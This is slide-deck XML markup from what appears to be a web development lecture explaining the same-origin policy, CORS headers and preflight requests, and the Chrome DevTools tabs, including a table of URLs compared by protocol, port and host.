                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://example.com/*</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="1"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For example, it </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> read resources at </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://othersite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</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This prevents pages from reading malicious resources from foreign hosts.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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Same-Origins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1453" name="Google Shape;1453;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454" name="Google Shape;1454;p95"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="605400" y="1129938"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{7BE036B0-01B0-44B2-8A13-DDC58F844C1E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4648275"/>
                <a:gridCol w="1367650"/>
                <a:gridCol w="2012625"/>
              </a:tblGrid>
              <a:tr h="391900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>URL</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Outcome</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reason</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="0" marB="0"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r h="639675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>http://store.company.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/dir2/other.html</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274E13"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Same origin</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>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Only the path differs</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3700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>http://store.company.com/dir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/inner/another.html</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274E13"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Same origin</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>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Only the path differs</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0750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>https://store.company.com/page.html</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990000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="990000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto Medium"/>
                        <a:ea typeface="Roboto Medium"/>
                        <a:cs typeface="Roboto Medium"/>
                        <a:sym typeface="Roboto Medium"/>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Different protocol</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57375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>http://store.company.com:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>81</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/dir/page.html</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990000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="990000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto Medium"/>
                        <a:ea typeface="Roboto Medium"/>
                        <a:cs typeface="Roboto Medium"/>
                        <a:sym typeface="Roboto Medium"/>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Different port (http:// is port 80 by default)</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1900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>http://news.company.com/dir/page.html</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rgbClr val="990000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="990000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto Medium"/>
                        <a:ea typeface="Roboto Medium"/>
                        <a:cs typeface="Roboto Medium"/>
                        <a:sym typeface="Roboto Medium"/>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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Different host</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="0" marB="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55" name="Google Shape;1455;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600475" y="4462200"/>
            <a:ext cx="7712400" cy="3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sz="1200" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy</a:t>
            </a:r>
            <a:endParaRPr sz="12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Cross-Origin Resource Sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1461" name="Google Shape;1461;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CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> allows browsers to perform cross-origin GET and POST requests.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1462" name="Google Shape;1462;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3" name="Google Shape;1463;p9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CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> uses special headers to determine if servers should allow cross-origin requests</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When a browser makes a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-origin request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, it sets an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> header, with the domain name of the server initiating the request</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When a server responds to this request, It will:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>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Read the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> header.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="9144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Set an Access-Control-Allow-Origin header and fulfill the request if it recognizes the Origin.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440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Respond with an error if it does not recognize the Origin.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Preflighting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Google Shape;1469;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0" name="Google Shape;1470;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12300" y="7606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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some more complicated CORS requests require the browser to:</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Send a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preflight request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to see if the server can use CORS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Send the full request after receiving the preflight response</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Preflight requests are sent in the following circumstances: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Request uses an HTTP method other than GET or POST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Requests uses custom headers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Request body contains non-text data (e.g., binary data)</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Request are preflighted to prevent browsers from firing requests for resources they don’t have the credentials to load from the target server.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Preflight Headers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476" name="Google Shape;1476;p9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7" name="Google Shape;1477;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="799200"/>
            <a:ext cx="9144000" cy="41073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Preflight requests use three headers:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access-Control-Request-Headers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="18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Responses to preflight requests also use three headers:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Methods</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="18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These headers allow the client and server to negotiate:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which resources can be exchanged</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How/Which HTTP methods can be used to transfer them</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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1" name="Shape 1481"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482;p9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Inspector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1483" name="Google Shape;1483;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sp>
        <p:nvSpPr>
          <p:cNvPr id="1488" name="Google Shape;148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Inspector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489" name="Google Shape;1489;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Open Chrome, press “Ctrl + Shift + I”, tabs include: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490;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1" name="Google Shape;1491;p100"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which allows you to inspect HTML</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="Google Shape;1492;p100"/>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800"/>
              <a:t>Console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> for running JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1493" name="Google Shape;1493;p100"/>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800"/>
              <a:t>Sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>, provides information on files used to load the current page</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1494" name="Google Shape;1494;p100"/>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800"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>, which contains information about requests/responses. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1495" name="Google Shape;1495;p100"/>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800"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>, which provides an overview of the page’s security.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Google Shape;1500;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Network Tab</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Google Shape;1501;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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Activity in the Networks tab:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1502" name="Google Shape;1502;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3" name="Google Shape;1503;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1175325"/>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b="1" lang="en"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the name of the requested file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
